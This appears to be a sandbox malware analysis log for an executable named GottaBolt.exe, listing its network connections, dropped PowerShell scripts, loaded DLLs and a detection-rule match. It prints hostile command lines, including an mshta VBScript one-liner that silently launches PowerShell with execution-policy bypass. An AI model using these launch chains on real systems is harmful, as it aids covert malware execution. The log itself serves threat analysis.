          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 mouse low level NULLJump to behavior

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F156820_2_00007FF848F15682
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F148D60_2_00007FF848F148D6
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F1E7DB0_2_00007FF848F1E7DB
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F201FA0_2_00007FF848F201FA
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F201D30_2_00007FF848F201D3
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F1D3290_2_00007FF848F1D329
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F200CF0_2_00007FF848F200CF
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FF848F200E70_2_00007FF848F200E7
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F34B814_2_00007FF848F34B81
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F492258_2_00007FF848F49225
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F441768_2_00007FF848F44176
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F44F228_2_00007FF848F44F22
          Source: GottaBolt.exeStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal72.evad.winEXE@16/17@1/2
          Source: C:\Users\user\Desktop\GottaBolt.exeFile created: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4n0wpwr.cc4.ps1Jump to behavior
          Source: GottaBolt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: GottaBolt.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\GottaBolt.exe "C:\Users\user\Desktop\GottaBolt.exe"
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: netfxperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: esentprf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfts.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: utildll.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msdtcuiu.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: atl.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msdtcprx.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mtxclu.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: clusapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: resutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msscntrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfdisk.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfnet.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfos.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfproc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: sysmain.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasctrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tapiperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfctrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: usbperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfos.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
